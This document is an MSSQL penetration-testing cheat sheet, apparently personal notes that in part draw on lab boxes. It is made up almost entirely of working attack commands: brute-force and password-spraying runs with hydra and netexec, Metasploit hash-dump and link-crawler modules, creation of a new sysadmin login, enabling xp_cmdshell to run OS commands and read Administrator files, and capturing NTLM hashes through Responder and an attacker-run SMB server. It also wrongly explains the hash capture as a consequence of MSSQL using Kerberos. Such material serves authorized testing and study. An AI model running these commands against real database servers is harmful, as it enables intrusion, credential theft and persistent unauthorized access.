MSSQL (Microsoft SQL) Pentesting

MSSQL is a relational database management system. A default port is 1433.

- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
- https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16

Enumeration

nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>

# MSDAT: https://github.com/quentinhardy/msdat
# all: Enumerate with all modules
python3 msdat.py all -s example.com
# -D, -U, -P: Use Windows authentication
python3 msdat.py all -s example.com -D domain -U username -P password
# xpdirectory: List directories in system
python3 msdat.py xpdirectory -s manager.htb -D manager -U operator -P operator -d master --list-files 'C:\'
# bulkopen: Read/download files
python3 msdat.py bulkopen -s example.com -D domain -U username -P password -d database --read-file 'C:\Users\Administrator\Desktop\example.txt'

# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

Brute Force Credentials

netexec mssql <target-ip> -u username -p passwords.txt

hydra -L usernames.txt –p password <target-ip> mssql
hydra -l username –P passwords.txt <target-ip> mssql


Password Spraying Attack

If we found the specific user password, we might be able to find another user with the same password.

netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success


Connect

# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database


Commands

# Get the version of MSSQL
> SELECT @@version

# Get current username
> SELECT user_name()

# Get all users
> SELECT * FROM sys.database_principals

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# Switch to the database
> USE <database>

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>


# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# List directories
> xp_dirtree '.\'
> xp_dirtree 'C:\inetpub\'
> xp_dirtree 'C:\inetpub\wwwroot\'
> xp_dirtree 'C:\Users\'


Spawn a Windows Command Shell and Run Commands using Impacket

If we connected MSSQL using impacket, we can exeucte the Windows Shell Commands by "enable_xp_cmdshell".

Enable/Disable a Windows Shell

> enable_xp_cmdshell
> disable_xp_cmdshell

# or

# Enable advanced options
> EXEC sp_configure 'show advanced options', 1;
# Update the currently configured value for the advanced options
> RECONFIGURE;

# Enable the command shell
> EXEC sp_configure 'xp_cmdshell', 1;
# Update the currently configured value for the command shell
> RECONFIGURE;

Commands

We can execute commands the same as Windows Command Prompt.

# Get current user
> xp_cmdshell whoami

# Show files and directories
> xp_cmdshell dir
> xp_cmdshell dir \Users
# Show hidden files
> xp_cmdshell dir /a

# Get current directory
> xp_cmdshell cd

# Get contents of file
> xp_cmdshell more \Users\Administrator\example.txt
> xp_cmdshell type \Users\Administrator\example.txt


Privilege Escalation

msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawler


Get NTLM Hash

MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.

1. Start SMB Server and Responder

First we need to start a SMB server and Responder in each terminal.

# In terminal 1
sudo responder -I <interface>

# In terminal 2
sudo impacket-smbserver share ./ -smb2support

# In terminal 3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

2. Execute with Metasploit

In msfconsole, select the following module.
We need to set the SMBPROXY option to the Responder IP (this ip is displayed when starting Responder in terminal).

msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
# If we use Windows credential, set as below:
msf> set use_windows_authent true
msf> set smbproxy <responder_ip>
msf> run

When executing, we can see the NTLM hash in the terminal where SMB server is running.